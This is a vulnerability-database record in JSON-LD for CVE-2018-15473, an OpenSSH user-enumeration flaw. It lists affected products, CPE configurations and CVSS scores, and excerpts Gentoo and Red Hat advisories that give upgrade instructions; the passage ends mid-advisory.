Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201808-0455", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssh", "scope": "lte", "trust": 1.8, "vendor": "openbsd", "version": "7.7" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "clustered data ontap", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "storage replication adapter", "scope": "gte", "trust": 1.0, "vendor": "netapp", "version": "7.2" }, { "model": "service processor", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "scalance x204rna", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "3.2.7" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "9.0" }, { "model": "steelstore cloud integrated storage", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "data ontap edge", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "aff baseboard management controller", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "16.04" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "vasa provider", "scope": "gte", "trust": 1.0, "vendor": "netapp", "version": "7.2" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "18.04" }, { "model": "ontap select deploy", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "oncommand unified manager", "scope": "gte", "trust": 1.0, "vendor": "netapp", "version": "9.4" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "cloud backup", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "virtual storage console", "scope": "gte", "trust": 1.0, "vendor": "netapp", "version": "7.2" }, { "model": "cn1610", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "data ontap", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "sun zfs storage appliance kit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.8.6" }, { "model": "fas baseboard management controller", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "openssh", "scope": "eq", "trust": 0.9, "vendor": "openbsd", "version": "4.2" }, { "model": "openssh", "scope": "eq", "trust": 0.9, "vendor": "openbsd", "version": "4.4" }, { "model": "openssh", "scope": "eq", "trust": 0.9, "vendor": "openbsd", "version": "5.1" }, { "model": "openssh", "scope": "eq", "trust": 0.9, "vendor": "openbsd", "version": "5.4" }, { "model": "openssh", "scope": "eq", "trust": 0.9, "vendor": "openbsd", "version": "5.2" }, { "model": "gnu/linux", "scope": null, "trust": 0.8, "vendor": "debian", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openbsd", "version": "5.3" }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openbsd", "version": "4.2p1" }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openbsd", "version": "1.5.8" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "4.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.16" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "3.0.2" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "1.2.3" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "4.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "2.1.x" }, { "model": "openssh p1", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "2.3.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "4.6" }, { "model": "openssh 5.8p2", "scope": null, "trust": 0.3, "vendor": "openbsd", "version": null }, { "model": "openssh p1", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "3.9" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "2.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "6.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "data exchange layer", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.1.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "6.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "3.0" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "4.9" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.7.16" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "4.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "5.7" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.16" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "3.0.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.3" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "2.2.x" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "2.9" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "5.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "5.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.12" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.5" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "6.0" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "2.5.2" }, { "model": "openssh 4.3p1", "scope": null, "trust": 0.3, "vendor": "openbsd", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "openssh p1", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "3.0.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "5.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.75" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "data exchange layer hotfix", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "4.1.21" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.126" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "2.1.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "6.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.12.9" }, { "model": "openssh p1", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "3.0.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.15" }, { "model": "openssh p2", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "2.5.2" }, { "model": "openssh p1", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "3.8.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.5" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "7.7" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "2.3.1" }, { "model": "openssh p1", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "3.0" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "5.9" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.11" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "2.2.0" }, { "model": "openssh 4.7p1", "scope": null, "trust": 0.3, "vendor": "openbsd", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.68" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "openssh p1", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "2.9" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "openssh p2", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "2.9" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "5.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "data exchange layer", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.4" }, { "model": "openssh 4.2p1", "scope": null, "trust": 0.3, "vendor": "openbsd", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.8" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "4.8" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.10" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "1.2" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "4.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "6.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "openssh p1", "scope": "eq", "trust": 0.3, "vendor": "openbsd", "version": "2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "aix l", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.9" }, { "model": "data exchange layer", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" } ], "sources": [ { "db": "BID", "id": "105140" }, { "db": "JVNDB", "id": "JVNDB-2018-009191" }, { "db": "NVD", "id": "CVE-2018-15473" }, { "db": "CNNVD", "id": "CNNVD-201808-536" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "7.7", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netapp:cn1610_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netapp:cn1610:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:data_ontap_edge:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:ontap_select_deploy:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netapp:clustered_data_ontap:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:service_processor:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netapp:data_ontap:-:*:*:*:*:7-mode:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:fas_baseboard_management_controller:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:aff_baseboard_management_controller:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_unified_manager:*:*:*:*:*:vsphere:*:*", "cpe_name": [], "versionStartIncluding": "9.4", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:virtual_storage_console:*:*:*:*:*:vsphere:*:*", "cpe_name": [], "versionStartIncluding": "7.2", "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:netapp:vasa_provider:*:*:*:*:*:*:*:*", "cpe_name": [], "versionStartIncluding": "7.2", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netapp:clustered_data_ontap:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:netapp:storage_replication_adapter:*:*:*:*:*:vsphere:*:*", "cpe_name": [], "versionStartIncluding": "7.2", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netapp:clustered_data_ontap:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:sun_zfs_storage_appliance_kit:8.8.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:siemens:scalance_x204rna_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.2.7", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:siemens:scalance_x204rna:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2018-15473" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat,The vendor reported this issue.,OpenSSL", "sources": [ { "db": "CNNVD", "id": "CNNVD-201808-536" } ], "trust": 0.6 }, "cve": "CVE-2018-15473", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.0, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2018-15473", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-125736", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitabilityScore": 3.9, "impactScore": 1.4, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.3, "baseSeverity": "Medium", "confidentialityImpact": "Low", "exploitabilityScore": null, "id": "CVE-2018-15473", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2018-15473", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201808-536", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-125736", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2018-15473", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-125736" }, { "db": "VULMON", "id": "CVE-2018-15473" }, { "db": "JVNDB", "id": "JVNDB-2018-009191" }, { "db": "NVD", "id": "CVE-2018-15473" }, { "db": "CNNVD", "id": "CNNVD-201808-536" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. OpenSSH Contains an information disclosure vulnerability.Information may be obtained. OpenSSH is prone to a user-enumeration vulnerability. \nAn attacker may leverage this issue to harvest valid user accounts, which may aid in brute-force attacks. \nOpenSSH through 7.7 are vulnerable; other versions may also be affected. This tool is an open source implementation of the SSH protocol, supports encryption of all transmissions, and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. This vulnerability stems from configuration errors in network systems or products during operation. \n\nImpact\n======\n\nA remote attacker could conduct user enumeration. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSH users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/openssh-7.7_p1-r8\"\n\nReferences\n==========\n\n[ 1 ] CVE-2018-15473\n https://nvd.nist.gov/vuln/detail/CVE-2018-15473\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201810-03\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2018 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. 6) - i386, x86_64\n\n3. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Low: openssh security, bug fix, and enhancement update\nAdvisory ID: RHSA-2019:2143-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2019:2143\nIssue date: 2019-08-06\nCVE Names: CVE-2018-15473\n====================================================================\n1. Summary:\n\nAn update for openssh is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Low. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, 